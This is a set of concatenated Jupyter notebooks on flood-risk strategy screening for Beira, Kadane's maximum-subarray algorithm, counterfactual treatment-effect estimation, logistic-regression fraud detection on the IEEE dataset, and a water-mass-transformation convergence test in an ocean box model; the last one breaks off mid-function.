flores_sim.save_source('urban_development_scenarios', urban_scenarios_data, 'yes')
###Output
All sources defined. Importing datasets.
###Markdown
4 Screen flood risk reduction stategies- make choice on number of storms to use, which measures to compare, how many strategies to compare- Run model
###Code
ema_logging.log_to_stderr(level=ema_logging.INFO)
flores_screen = ReplicatorModel('Beira', function=flores_sim.screening_simulation_model)
flores_screen.replications = [{"return_period_rainfall": 100, "return_period_storm_surge": 100},
{"return_period_rainfall": 50, "return_period_storm_surge": 100},
{"return_period_rainfall": 10, "return_period_storm_surge": 100},
{"return_period_rainfall": 5, "return_period_storm_surge": 100},
{"return_period_rainfall": 0, "return_period_storm_surge": 100},
{"return_period_rainfall": 100, "return_period_storm_surge": 50},
{"return_period_rainfall": 50, "return_period_storm_surge": 50},
{"return_period_rainfall": 10, "return_period_storm_surge": 50},
{"return_period_rainfall": 5, "return_period_storm_surge": 50},
{"return_period_rainfall": 0, "return_period_storm_surge": 50},
{"return_period_rainfall": 100, "return_period_storm_surge": 10},
{"return_period_rainfall": 50, "return_period_storm_surge": 10},
{"return_period_rainfall": 10, "return_period_storm_surge": 10},
{"return_period_rainfall": 5, "return_period_storm_surge": 10},
{"return_period_rainfall": 0, "return_period_storm_surge": 10},
{"return_period_rainfall": 100, "return_period_storm_surge": 5},
{"return_period_rainfall": 50, "return_period_storm_surge": 5},
{"return_period_rainfall": 10, "return_period_storm_surge": 5},
{"return_period_rainfall": 5, "return_period_storm_surge": 5},
{"return_period_rainfall": 0, "return_period_storm_surge": 5},
{"return_period_rainfall": 100, "return_period_storm_surge": 0},
{"return_period_rainfall": 50, "return_period_storm_surge": 0},
{"return_period_rainfall": 10, "return_period_storm_surge": 0},
{"return_period_rainfall": 5, "return_period_storm_surge": 0},
{"return_period_rainfall": 'INFO', "return_period_storm_surge": 'INFO'}]
leverlist = []
structural_measures = {}
structural_locations = {}
for measure in flores_sim.AllMeasures:
if flores_sim.AllMeasures[measure].Type == 'Structural':
structural_measures[measure] = flores_sim.AllMeasures[measure].Location
else:
leverlist.append(CategoricalParameter(measure, [True, False]))
for measure, location in structural_measures.items():
if location not in structural_locations:
structural_locations[location] = [measure]
else:
structural_locations[location].append(measure)
for location in structural_locations:
structural_locations[location].append('none')
leverlist.append(CategoricalParameter('structure-' + location, structural_locations[location]))
first_measure = structural_locations[location][0]
leverlist.append(RealParameter('height-' + location, flores_sim.AllMeasures[first_measure].StructureHeights[0],
flores_sim.AllMeasures[first_measure].StructureHeights[-1]))
flores_screen.levers = leverlist
flores_screen.constants = [Constant('urban_development_scenario', 'low')]
flores_screen.uncertainties = [CategoricalParameter('climate_scenario', ['low', 'high'])]
flores_screen.outcomes = [ScalarOutcome("risk_reduction", function=process_risk),
ScalarOutcome("construction_costs", function=pick_one),
ScalarOutcome("affected_pop_reduction", function=process_affected_people)]
nr_strategies = 500
today = date.today()
fn = ('Projects/FLORES_beira/data/{0} experiments_FLORES_{1}_{2}_tandem_trapz.tar.gz'.format(nr_strategies, 'Beira', today))
print('ready for screening')
###Output
ready for screening
###Markdown
run screening*warning, this may take several hours to run. If you want to analyze a previous screening, skip this block*
###Code
path_fn = os.path.join(path_src, fn).replace('\\','/')
print(path_fn)
if not os.path.exists(path_fn):
start = timer()
#with SequentialEvaluator(flores_screen) as evaluator:
with MultiprocessingEvaluator(flores_screen, n_processes=8) as evaluator:
results = evaluator.perform_experiments(scenarios=2, policies=nr_strategies,
uncertainty_sampling='ff', reporting_interval=1)
save_results(results, path_fn)
print("done")
end = timer()
print(end - start)
###Output
D:/GitHub/FLORES-Beira/src/Projects/FLORES_beira/data/500 experiments_FLORES_Beira_2019-11-29_tandem_trapz.tar.gz
###Markdown
5 Flood Risk AnalysisWith the use of the screening tool, many flood risk reduction strategies have been simulated. Next, we will use a selection of tools to analyze the results.First, we will list all previous screening runs. If you want to view the results, copy the string into the code cell below at: str_path_results = str(data_directory.joinpath(*insert string here*))
###Code
from os import listdir
data_directory = path_current / 'Projects' / 'FLORES_beira' / 'data'
listdir(data_directory)
from ema_workbench import load_results
#str_path_results = str(data_directory.joinpath('25 experiments_FLORES_Beira_2019-11-16.tar.gz'))
#results = load_results(str_path_results)
experiments, outcomes = results
print(experiments.shape)
print(list(outcomes.keys()))
from ema_workbench.analysis import pairs_plotting
fig, axes = pairs_plotting.pairs_scatter(experiments, outcomes, group_by='policy',
legend=False)
fig.set_size_inches(8,8)
pyplot.show()
#import numpy.lib.recfunctions as rf
from ema_workbench.analysis import feature_scoring
import seaborn as sns
#results_update = results.where((pd.notnull(results)),'none')
#experiments = rf.drop_fields(experiments, ['policy'], asrecarray=True)
x = experiments
y = outcomes
# focus dataset on 1 climate scenario
#x_bool = x[x_bool==1]
#y_new = y[x_bool==1]
fs = feature_scoring.get_feature_scores_all(x, y)
sns.heatmap(fs, cmap='viridis', annot=True)
pyplot.show()
from ema_workbench.analysis import prim
b1= outcomes['risk_reduction'] > 0.40
b2= outcomes['construction_costs'] < 125
b3= outcomes['affected_pop_reduction'] > 0.65
b4= x['climate_scenario'] == 'low'
y = b1 & b2 & b3 &b4
prim_alg = prim.Prim(x,y, threshold=0.7)
box1 = prim_alg.find_box()
box1.show_tradeoff()
pyplot.show()
box1.show_pairs_scatter()
pyplot.show()
###Output
climate_scenario ['low', 'high']
CD_1 [False, True]
policy [0, 1, 2, 3, 5, 6, 7, 8, 10, 11, 12, 13, 14, 15, 17, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 31, 32, 33, 34, 35, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 66, 67, 69, 70, 71, 72, 73, 75, 76, 77, 78, 79, 80, 81, 82, 83, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 98, 99, 100, 101, 102, 103, 105, 107, 109, 110, 111, 112, 113, 114, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 130, 131, 132, 134, 135, 137, 138, 139, 141, 142, 143, 144, 145, 146, 147, 149, 152, 153, 154, 155, 156, 157, 158, 159, 161, 162, 163, 164, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 179, 180, 181, 182, 183, 184, 185, 186, 187, 189, 190, 191, 192, 193, 194, 195, 196, 197, 200, 201, 202, 203, 204, 205, 206, 208, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 222, 223, 224, 225, 226, 227, 228, 229, 231, 233, 235, 236, 239, 240, 241, 245, 246, 247, 248, 251, 252, 253, 254, 255, 256, 257, 258, 260, 261, 263, 266, 267, 268, 269, 271, 272, 273, 274, 277, 278, 279, 280, 281, 282, 284, 285, 286, 289, 292, 293, 295, 296, 297, 298, 299, 303, 304, 305, 306, 307, 308, 310, 311, 312, 314, 315, 316, 317, 318, 319, 320, 321, 322, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 335, 337, 338, 339, 340, 341, 342, 344, 345, 346, 349, 350, 351, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 365, 366, 367, 368, 369, 370, 371, 372, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 386, 387, 388, 389, 391, 392, 394, 395, 397, 399, 400, 404, 405, 406, 408, 409, 410, 412, 413, 416, 417, 418, 419, 421, 422, 423, 424, 425, 426, 427, 428, 430, 431, 434, 435, 436, 437, 438, 439, 442, 443, 444, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 478, 479, 480, 481, 482, 483, 484, 485, 486, 488, 489, 490, 491, 492, 494, 495, 496, 497, 498, 499, 4, 9, 16, 18, 30, 36, 47, 65, 68, 74, 84, 95, 96, 97, 104, 106, 108, 115, 116, 128, 129, 133, 136, 140, 148, 150, 151, 160, 165, 178, 188, 198, 199, 207, 209, 221, 230, 232, 234, 237, 238, 242, 243, 244, 249, 250, 259, 262, 264, 265, 270, 275, 276, 283, 287, 288, 290, 291, 294, 300, 301, 302, 309, 313, 323, 334, 336, 343, 347, 348, 352, 364, 373, 374, 385, 390, 393, 396, 398, 401, 402, 403, 407, 411, 414, 415, 420, 429, 432, 433, 440, 441, 445, 464, 476, 477, 487, 493]
|
_notebooks/2021-02-19-max-subarray-kadane-algo.ipynb | ###Markdown
Find maximum sum subarray> Given an array, find contigous subarray that has maximum sum- toc: false- badges: true- comments: true- categories: [array, dynamic programming] ProblemGiven an array, find a subarray (contigous element in array) that has maximum sum. Example:```Input: [-2, 1, -3, 4, -1, 2, 1, -5, 4]Output: 6The sum of subarray [4, -1, 2, 1] is 6 which is maximum of all subarray possible``` SolutionKadane's algorithm {% cite wiki_kadane %} scan's the given array and maintains maximum sum at all the index.
###Code
def max_sum_subarray(nums):
# stores the maximum sum sublist found so far
max_so_far = nums[0]
# stores the maximum sum of sublist ending at the current position
max_ending_here = nums[0]
# traverse the given list
for num in nums[1:]:
# update the maximum sum of sublist "ending" at index `i`
max_ending_here = max_ending_here + num
# maximum sum should be more than the current element
max_ending_here = max(max_ending_here, num)
# update the result if the current sublist sum is found to be greater
max_so_far = max(max_so_far, max_ending_here)
return max_so_far
#collapse-hide
nums = [-2, -1, -3, -4, -1, -2, -1, -5, -4]
print(f"Max sum subaary of {nums} = {max_sum_subarray(nums)}")
nums = [-2, 1, -3, 4, -1, 2, 1, -5, 4]
print(f"Max sum subaary of {nums} = {max_sum_subarray(nums)}")
###Output
Max sum subaary of [-2, -1, -3, -4, -1, -2, -1, -5, -4] = -1
Max sum subaary of [-2, 1, -3, 4, -1, 2, 1, -5, 4] = 6
|
03 Estimate counterfactual outcomes for each base learner.ipynb | ###Markdown
Import Modules
###Code
import numpy as np
import pandas as pd
import json
import scipy
from scipy.spatial.distance import mahalanobis
import scipy.optimize as optimize
from sklearn.linear_model import ElasticNetCV, Lasso
from base_learners.data_loading import load_data, load_from_folder
from visualization.counterfactual_plot import plot_df
from base_learners.base_analysis import get_ate, report_ate, count_coefs, tradeoff
###Output
_____no_output_____
###Markdown
Check current senario and $T_0$
###Code
with open('src/senario_selection.json', 'r') as f:
json_selection = json.load(f)
senario = json_selection['senario']
T0 = json_selection['T0']
print('We are currently in senario', senario, f'with T0 = {T0}')
###Output
We are currently in senario D with T0 = 24
###Markdown
Load data
###Code
control_data, treat_data, untreat_data = load_data(senario)
###Output
_____no_output_____
###Markdown
Parameters
###Code
T = control_data[0].shape[1] # Total periods
sample_size = len(control_data) # How many times we draw data
control_units = control_data[0].shape[0] # How many control units we have
###Output
_____no_output_____
###Markdown
Prepare for MDD method: matching and optimization
###Code
# Matching Difference-in-Difference (MDD): Matching.
# Minimizing the Mahalonobis distance between the treaded and
# each control unit in the pretreatment period.
distances = np.zeros((sample_size, control_units))
for i in np.arange(sample_size):
for j in np.arange(control_units):
control_unit = control_data[i].values[j][:T0].reshape(1, -1)
treat_unit = treat_data[i].values[:T0].reshape(1,-1)
# Calculate the inverse of covariance matrix of two vectors.
df_comb = pd.DataFrame(np.concatenate((control_unit, treat_unit)))
cov = df_comb.cov()
try:
vi = scipy.linalg.inv(cov)
# Calculate the Mahalonobis distanec.
md = mahalanobis(control_unit.reshape(-1,), treat_unit.reshape(-1,), vi)
distances[i, j] = md
except:
print('Singular cov matrix occurs in (dataset, control unit):', (i+1, j))
idx_md_sort = np.argsort(distances, axis=1)
idx_five = idx_md_sort[:, :5]
def func_loss(params):
"""
Used in the loop!
"""
w, alpha = params
treat = treat_data[i].values[:T0].reshape(-1,)
return np.sum((treat - w * np.sum(control_select.T, axis=1) - alpha * np.ones((T0,))) ** 2)
# MDD: optimazation
# For each iteration, pick up the control unit according to the previous selection.
results = []
initial_guess = [0.2, 1]
for i in np.arange(sample_size):
control_unit = control_data[i].values[:, :T0]
idx_select = idx_five[i,:]
control_select = control_unit[idx_select,:]
# Optimization
result = optimize.minimize(func_loss, initial_guess)
results.append(result)
###Output
_____no_output_____
###Markdown
Get counterfactual predictions for all methods
###Code
# Sum-to-one constraint.
magnitude = 1e5
add = np.ones((control_units, 1)).T * magnitude
# For selecting penalty term using cv: by default we use 5-KFold.
# If there are not enough periods for cv, then use leave-one-out.
if T0 < 5:
kf = T0
else:
kf=5
counterfactuals_syn = []
coefs_syn = []
counterfactuals_mdd = []
coefs_mdd = []
counterfactuals_lasso = []
coefs_lasso = []
for i in np.arange(sample_size):
X = control_data[i].values[:, :T0].T
y = treat_data[i].values.reshape(-1,)[:T0]
X_predict = control_data[i].values[:, T0:].T
X_restr = np.concatenate((X, add), axis=0)
y_restr = np.append(y, magnitude)
# Synthetic Method
print('{}th iteration: Synthetic Method'.format(i+1))
regr_syn = Lasso(alpha=0, max_iter=5000, positive=True)
regr_syn.fit(X_restr, y_restr)
y_hat_syn = regr_syn.predict(X_predict)
counterfactuals_syn.append(y_hat_syn)
coefs_syn.append(regr_syn.coef_)
# MDD Method
print('{}th iteration: MDD Method'.format(i+1))
y_hat_mdd = results[i].x[0] * np.sum(X_predict[:, idx_five[i]], axis=1) + results[i].x[1]
counterfactuals_mdd.append(y_hat_mdd)
coefs_mdd.append(np.array([results[i].x[0]] * 5))
# Lasso
print('{}th iteration: Lasso'.format(i+1))
regr = ElasticNetCV(l1_ratio=1, cv=kf, max_iter=5000)
regr.fit(X, y)
y_hat_lasso = regr.predict(X_predict)
counterfactuals_lasso.append(y_hat_lasso)
coefs_lasso.append(regr.coef_)
# Directly import the imputed data, which has been computed in 02 notebook.
path_mc = 'base_learners/mc_counterfactual/'
mc_imputed = load_from_folder(path_mc)
# Extract the last ten elements from the last row:
# this is the values we estimated.
counterfactuals_mc = []
for i in np.arange(len(mc_imputed)):
mc_est = mc_imputed[i].values[-1, T0:]
counterfactuals_mc.append(mc_est)
###Output
1th iteration: Synthetic Method
1th iteration: MDD Method
1th iteration: Lasso
2th iteration: Synthetic Method
2th iteration: MDD Method
2th iteration: Lasso
###Markdown
Analysis
###Code
plot_df(control_data[40], f'Senario {senario}: SC', treat_data[40], counterfactuals_syn[40], save_fig=True, case='SC')
ate_hat_syn, ate_syn = get_ate(counterfactuals_syn, control_data, treat_data, untreat_data, T0)
number_control_syn = count_coefs(coefs_syn)
report_ate(ate_hat_syn, number_control_syn)
tradeoff(ate_hat_syn, ate_syn, sample_size)
plot_df(control_data[40], f'Senario {senario}: MDD', treat_data[40], counterfactuals_mdd[40], save_fig=True, case='MDD')
ate_hat_mdd, ate_mdd = get_ate(counterfactuals_mdd, control_data, treat_data, untreat_data, T0)
number_control_mdd = count_coefs(coefs_mdd)
report_ate(ate_hat_mdd, number_control_mdd)
tradeoff(ate_hat_mdd, ate_mdd, sample_size)
plot_df(control_data[40], f'Senario {senario}: Lasso', treat_data[40], counterfactuals_lasso[40], save_fig=True, case='Lasso')
ate_hat_lasso, ate_lasso = get_ate(counterfactuals_lasso, control_data, treat_data, untreat_data, T0)
number_control_lasso = count_coefs(coefs_lasso)
report_ate(ate_hat_lasso, number_control_lasso)
tradeoff(ate_hat_lasso, ate_lasso, sample_size)
plot_df(control_data[40], f'Senario {senario}: MC', treat_data[40], counterfactuals_mc[40], save_fig=True, case='MC')
ate_hat_mc, ate_mc = get_ate(counterfactuals_mc, control_data, treat_data, untreat_data, T0)
report_ate(ate_hat_mc, control_idx_list=None)
tradeoff(ate_hat_mc, ate_mc, sample_size)
###Output
Bias^2:
[0.00242623 0.03881547 0.00042577 0.03023326 0.00017013 0.02343535]
Variance:
[1.34789563 2.0108772 1.98753039 2.24865216 2.22820708 1.78984223]
Bias^2 + Variance:
[1.35032186 2.04969267 1.98795616 2.27888542 2.2283772 1.81327758]
MSE for verification:
[1.35032186 2.04969267 1.98795616 2.27888542 2.2283772 1.81327758]
###Markdown
Store some variables for usage in notebook 05 and 06
###Code
%%capture
%store T
%store senario
%store T0
%store add
%store kf
%store control_units
%store sample_size
%store control_data
%store treat_data
%store untreat_data
%store initial_guess
%store magnitude
%store counterfactuals_syn
%store counterfactuals_mdd
%store counterfactuals_lasso
%store counterfactuals_mc
%store ate_hat_syn
%store ate_syn
%store ate_hat_lasso
%store ate_lasso
%store ate_hat_mdd
%store ate_mdd
%store ate_hat_mc
%store ate_mc
###Output
_____no_output_____ |
fraud_detection/fraud_detection.ipynb | ###Markdown
Fraud detectionUsing logictic regression to predict fraud. Parameters
###Code
DATA = './input/ieee-fraud-detection.zip'
###Output
_____no_output_____
###Markdown
Data 1. Imports
###Code
# System
from zipfile import ZipFile
import os
# Data manipulation and analysis
import pandas as pd
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
# Visualization
import matplotlib.pyplot as plt
%matplotlib inline
import seaborn as sns
sns.set()
###Output
_____no_output_____
###Markdown
2. Loading
###Code
dfs = {}
with ZipFile(DATA) as zip:
for data in zip.infolist():
print('> Processing :', data.filename, end='')
filename = os.path.splitext(data.filename)[0]
dfs[filename] = pd.read_csv(zip.open(data.filename))
print(' - done!')
dfs.keys()
###Output
_____no_output_____
###Markdown
3. Exploration
###Code
dfs['train_identity'].head()
dfs['train_transaction'].head()
dfs['train_identity'].shape
dfs['train_transaction'].shape
df_train = pd.merge(dfs['train_transaction'], dfs['train_identity'], on='TransactionID', how='left')
df_train.shape
df_train.head()
print(df_train.columns.tolist())
###Output
['TransactionID', 'isFraud', 'TransactionDT', 'TransactionAmt', 'ProductCD', 'card1', 'card2', 'card3', 'card4', 'card5', 'card6', 'addr1', 'addr2', 'dist1', 'dist2', 'P_emaildomain', 'R_emaildomain', 'C1', 'C2', 'C3', 'C4', 'C5', 'C6', 'C7', 'C8', 'C9', 'C10', 'C11', 'C12', 'C13', 'C14', 'D1', 'D2', 'D3', 'D4', 'D5', 'D6', 'D7', 'D8', 'D9', 'D10', 'D11', 'D12', 'D13', 'D14', 'D15', 'M1', 'M2', 'M3', 'M4', 'M5', 'M6', 'M7', 'M8', 'M9', 'V1', 'V2', 'V3', 'V4', 'V5', 'V6', 'V7', 'V8', 'V9', 'V10', 'V11', 'V12', 'V13', 'V14', 'V15', 'V16', 'V17', 'V18', 'V19', 'V20', 'V21', 'V22', 'V23', 'V24', 'V25', 'V26', 'V27', 'V28', 'V29', 'V30', 'V31', 'V32', 'V33', 'V34', 'V35', 'V36', 'V37', 'V38', 'V39', 'V40', 'V41', 'V42', 'V43', 'V44', 'V45', 'V46', 'V47', 'V48', 'V49', 'V50', 'V51', 'V52', 'V53', 'V54', 'V55', 'V56', 'V57', 'V58', 'V59', 'V60', 'V61', 'V62', 'V63', 'V64', 'V65', 'V66', 'V67', 'V68', 'V69', 'V70', 'V71', 'V72', 'V73', 'V74', 'V75', 'V76', 'V77', 'V78', 'V79', 'V80', 'V81', 'V82', 'V83', 'V84', 'V85', 'V86', 'V87', 'V88', 'V89', 'V90', 'V91', 'V92', 'V93', 'V94', 'V95', 'V96', 'V97', 'V98', 'V99', 'V100', 'V101', 'V102', 'V103', 'V104', 'V105', 'V106', 'V107', 'V108', 'V109', 'V110', 'V111', 'V112', 'V113', 'V114', 'V115', 'V116', 'V117', 'V118', 'V119', 'V120', 'V121', 'V122', 'V123', 'V124', 'V125', 'V126', 'V127', 'V128', 'V129', 'V130', 'V131', 'V132', 'V133', 'V134', 'V135', 'V136', 'V137', 'V138', 'V139', 'V140', 'V141', 'V142', 'V143', 'V144', 'V145', 'V146', 'V147', 'V148', 'V149', 'V150', 'V151', 'V152', 'V153', 'V154', 'V155', 'V156', 'V157', 'V158', 'V159', 'V160', 'V161', 'V162', 'V163', 'V164', 'V165', 'V166', 'V167', 'V168', 'V169', 'V170', 'V171', 'V172', 'V173', 'V174', 'V175', 'V176', 'V177', 'V178', 'V179', 'V180', 'V181', 'V182', 'V183', 'V184', 'V185', 'V186', 'V187', 'V188', 'V189', 'V190', 'V191', 'V192', 'V193', 'V194', 'V195', 'V196', 'V197', 'V198', 'V199', 'V200', 'V201', 'V202', 'V203', 'V204', 'V205', 'V206', 'V207', 'V208', 'V209', 'V210', 'V211', 'V212', 'V213', 'V214', 'V215', 'V216', 'V217', 'V218', 'V219', 'V220', 'V221', 'V222', 'V223', 'V224', 'V225', 'V226', 'V227', 'V228', 'V229', 'V230', 'V231', 'V232', 'V233', 'V234', 'V235', 'V236', 'V237', 'V238', 'V239', 'V240', 'V241', 'V242', 'V243', 'V244', 'V245', 'V246', 'V247', 'V248', 'V249', 'V250', 'V251', 'V252', 'V253', 'V254', 'V255', 'V256', 'V257', 'V258', 'V259', 'V260', 'V261', 'V262', 'V263', 'V264', 'V265', 'V266', 'V267', 'V268', 'V269', 'V270', 'V271', 'V272', 'V273', 'V274', 'V275', 'V276', 'V277', 'V278', 'V279', 'V280', 'V281', 'V282', 'V283', 'V284', 'V285', 'V286', 'V287', 'V288', 'V289', 'V290', 'V291', 'V292', 'V293', 'V294', 'V295', 'V296', 'V297', 'V298', 'V299', 'V300', 'V301', 'V302', 'V303', 'V304', 'V305', 'V306', 'V307', 'V308', 'V309', 'V310', 'V311', 'V312', 'V313', 'V314', 'V315', 'V316', 'V317', 'V318', 'V319', 'V320', 'V321', 'V322', 'V323', 'V324', 'V325', 'V326', 'V327', 'V328', 'V329', 'V330', 'V331', 'V332', 'V333', 'V334', 'V335', 'V336', 'V337', 'V338', 'V339', 'id_01', 'id_02', 'id_03', 'id_04', 'id_05', 'id_06', 'id_07', 'id_08', 'id_09', 'id_10', 'id_11', 'id_12', 'id_13', 'id_14', 'id_15', 'id_16', 'id_17', 'id_18', 'id_19', 'id_20', 'id_21', 'id_22', 'id_23', 'id_24', 'id_25', 'id_26', 'id_27', 'id_28', 'id_29', 'id_30', 'id_31', 'id_32', 'id_33', 'id_34', 'id_35', 'id_36', 'id_37', 'id_38', 'DeviceType', 'DeviceInfo']
###Markdown
Visualizing missing data
###Code
missing_data_columns = df_train.isnull().sum().sort_values(ascending=False);
missing_data_percentage = missing_data_columns / len(df_train) * 100;
plt.figure(figsize=(80,10))
sns.barplot(x=missing_data_columns.index, y=missing_data_percentage)
plt.title('Missing data')
plt.xlabel('Columns')
plt.ylabel('Percentage (%)')
plt.xticks(rotation=90)
plt.show()
###Output
_____no_output_____
###Markdown
4. Preparation a. Remove all columns with more than 75% missing data
###Code
missing_data_percentage = df_train.isnull().sum() / len(df_train) * 100
missing_data_percentage > 75
missing_data_percentage[missing_data_percentage > 75]
df_train_step_1_clean = df_train[missing_data_percentage[missing_data_percentage < 75].index]
df_train.shape
df_train_step_1_clean.shape
df_train_step_1_clean.head()
df_train = df_train_step_1_clean
###Output
_____no_output_____
###Markdown
b. Convert categorical variables into dummy/indicator variables
###Code
df_train_objects = df_train[df_train.select_dtypes(include=['object']).columns]
df_train_objects
dummy1 = pd.get_dummies(df_train_objects['P_emaildomain'])
dummy1.head()
dummy2 = pd.get_dummies(df_train_objects['card4'])
dummy2.head()
df_train_converted_objects = pd.get_dummies(df_train_objects)
df_train_converted_objects.head()
df_train_converted_objects.shape
df_train_step_2_clean = df_train.drop(df_train_objects, axis=1)
df_train_step_2_clean.head()
df_train_step_2_clean = pd.concat([df_train_step_2_clean, df_train_converted_objects], axis=1)
df_train_step_2_clean.head()
df_train_step_2_clean.shape
df_train = df_train_step_2_clean
###Output
_____no_output_____
###Markdown
c. Replace missing data (NaN)
###Code
missing_data_set = df_train.isnull().sum().sort_values(ascending=False)
plt.figure(figsize=(80,10))
sns.barplot(x=missing_data_set.index,
y=missing_data_set / len(df_train) * 100)
plt.title('Missing data')
plt.xlabel('Columns')
plt.ylabel('Percentage (%)')
plt.xticks(rotation=90)
plt.show()
missing_data_set[missing_data_set > 0]
df_train['dist1'].isnull().sum()
df_train['dist1'].mean()
df_train['dist1'].median()
df_train['dist1'].mode()
df_train['V291']
for column in missing_data_set[missing_data_set > 0].index:
print('>', column)
print(df_train[column].isnull().sum(), df_train[column].mean(), df_train[column].median(), df_train[column].mode())
# Arbitrarily choose to replace the missing value with the median. Don't want to add new values with the mean.
df_train[column].fillna(df_train[column].median(), inplace=True)
df_train.isnull().values.any()
###Output
_____no_output_____
###Markdown
Modeling
###Code
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
x_full_df = df_train.drop(["isFraud"], axis=1)
y_full_df = df_train["isFraud"]
X_train, X_test, y_train, y_test = train_test_split(x_full_df, y_full_df, test_size=0.30)
lr = LogisticRegression(solver='lbfgs', max_iter=1000)
lr.fit(X_train, y_train)
lr.score(X_test, y_test)
###Output
_____no_output_____ |
notebooks/draw_wmt-convergence_box.ipynb | ###Markdown
Convergence of WMT calculation at small dlExample in box initialized with linear stratification and subject to vertical diffusion
###Code
import xarray as xr
import numpy as np
from matplotlib import pyplot as plt
from xarrayutils import vertical_coordinates as vc
## LOAD DATA
vgrid = 'native'
averaging = '6h'
# Time-mean tendencies
rootdir = '/archive/gam/MOM6-gm/ocean_only/box/dev_core/'+averaging+'/'
filename = 'ocean_'+vgrid+'.nc'
ds = xr.open_dataset(rootdir+filename)
# Time steps
delta_t = ds['average_DT'].astype('timedelta64[s]')
# Grid
filename_grid = 'ocean_static.nc'
grid = xr.open_dataset(rootdir+filename_grid)
# Constants
cp = 3992.0
rho0 = 1035.0
# Snapshots
filename_snap = 'ocean_'+vgrid+'_snap.nc'
ds_snap = xr.open_dataset(rootdir+filename_snap)
###Output
/nbhome/gam/miniconda/envs/mom6-clean/lib/python3.8/site-packages/xarray/coding/times.py:426: SerializationWarning: Unable to decode time axis into full numpy.datetime64 objects, continuing using cftime.datetime objects instead, reason: dates out of range
dtype = _decode_cf_datetime_dtype(data, units, calendar, self.use_cftime)
###Markdown
Specify the depth of layers on the native gridThis is done for the time-mean fields and the snapshot fields
###Code
### Time-mean properties
nt = len(ds['time'])
l = ds['temp'][{'time':slice(1,nt)}] # Scalar defining contours
h = ds['thkcello'][{'time':slice(1,nt)}] # Thickness
ps = (ds['opottempdiff'][{'time':slice(1,nt)}]/cp).to_dataset() # Diffusive processes changing l
# Get the depth of the layers on the native grid
z_i = xr.concat([xr.zeros_like(h.isel(zl=0)),h.cumsum(dim='zl')],dim='zl')
z_i = z_i.rename({'zl':'zi'})
z_i_vals = z_i.values
z_l_vals = 0.5*(z_i_vals[:,:,:,:-1]+z_i_vals[:,:,:,1:])
z_l = xr.DataArray(z_l_vals,dims=['time','yh','xh','zl'],coords={'time':l['time'],'xh':l['xh'],'yh':l['yh'],'zl':l['zl']})
### Snap-shots
l_snap = ds_snap['temp']
h_snap = ds_snap['thkcello']
# Get the depth of the layers on the native grid
z_snap_i = xr.concat([xr.zeros_like(h_snap.isel(zl=0)),h_snap.cumsum(dim='zl')],dim='zl')
z_snap_i = z_snap_i.rename({'zl':'zi'})
z_snap_i_vals = z_snap_i.values
z_snap_l_vals = 0.5*(z_snap_i_vals[:,:,:,:-1]+z_snap_i_vals[:,:,:,1:])
z_snap_l = xr.DataArray(z_snap_l_vals,dims=['time','yh','xh','zl'],coords={'time':z_snap_i.time,'xh':z_snap_i.xh,'yh':z_snap_i.yh,'zl':l['zl']})
###Output
_____no_output_____
###Markdown
Evaluate the residual of the WMT calculation for varying dlThis is done in a rather inefficient way - redoing the interpolation (time-consuming) for every new dl. However, it's done here for simplicity and consistency (more efficient ways, e.g. interpolating once then taking subset contours) also has inherent challenges).
###Code
### Wrapper function to do watermass transformation from linear interpolation onto l contours
def calc_wmt_linearinterp(l,ps,z_l,z_i,l_snap,z_snap_l,z_snap_i,delta_l,area,rho0=1035):
## Find the depths of l contours via linear interpolation
### High resolution in l
print('Calculating WMT with linear interpolation, delta_l = '+str(delta_l)+':')
l_i_vals = np.arange(-1,11,delta_l)
l_l_vals = 0.5*(l_i_vals[1:]+l_i_vals[:-1])
# Flip the order of the temperature bins
l_i = np.flip(l_i_vals)
l_i = xr.DataArray(l_i,coords={l.name+'_bin':l_i},dims=l.name+'_bin')
l_l = np.flip(l_l_vals)
l_l = xr.DataArray(l_l,coords={l.name+'_bin':l_l},dims=l.name+'_bin')
### Time-mean
print(' Finding depths of layer interfaces (time-mean fields)...')
l_i_depth = vc.linear_interpolation_regrid(z = z_l,
data = l,
target_values = l_i,
z_bounds = z_i,
target_value_dim = l.name+'_bin',
z_bounds_dim='zi',
z_dim='zl')
print(' Finding depths of l contours (snapshot fields)...')
l_snap_l_depth = vc.linear_interpolation_regrid(z = z_snap_l,
data = l_snap,
target_values = l_l,
z_bounds = z_snap_i,
target_value_dim = l.name+'_bin',
z_bounds_dim='zi',
z_dim='zl')
#### Calculation of E ####
### Remap properties to new l-contour grid
# Necessary only for the time-mean properties
# A little hacky to recover vertically integrated quantities (as opposed to layer mean quantities as is currently output by vc algorithm)
# 1. Convert tendency to pseudo-intensive quantity
# 2. Conservative remap
# 3. Muliply by new layer thickness
print(' Remapping tendencies into l layers...')
ps_remap=xr.Dataset()
for term in ps.data_vars:
print(term)
dz_orig = z_i.diff('zi').rename({'zi':'zl'})
ps_intensive = ps[term]/dz_orig
ps_intensive_remapped = vc.conservative_remap(data=ps_intensive,z_bnds_source=z_i, z_bnds_target=l_i_depth,
z_dim='zl', z_bnd_dim='zi', z_bnd_dim_target='regridded', mask=True)
ps_intensive_remapped = ps_intensive_remapped.assign_coords(remapped=np.flip(l_l_vals))
dz_targ = l_i_depth.diff('regridded').rename({'regridded':'remapped'}).assign_coords(remapped=np.flip(l_l_vals))
ps_remap[term] = ps_intensive_remapped*dz_targ
ps_remap = ps_remap.rename({'remapped':l.name+'_bin'})
print(' Integrating tendencies within layers to get E...')
E = (ps_remap['opottempdiff']*grid.areacello).sum(['xh','yh'])/delta_l
#### Calculation of dVdt ####
print(' Calcualting dVdt from change in contour depth...')
# We can calculate the volume change in time from the change in interface depth
dVdt = (rho0*l_snap_l_depth*area).sum(['xh','yh']).diff('time')/(6*60*60)
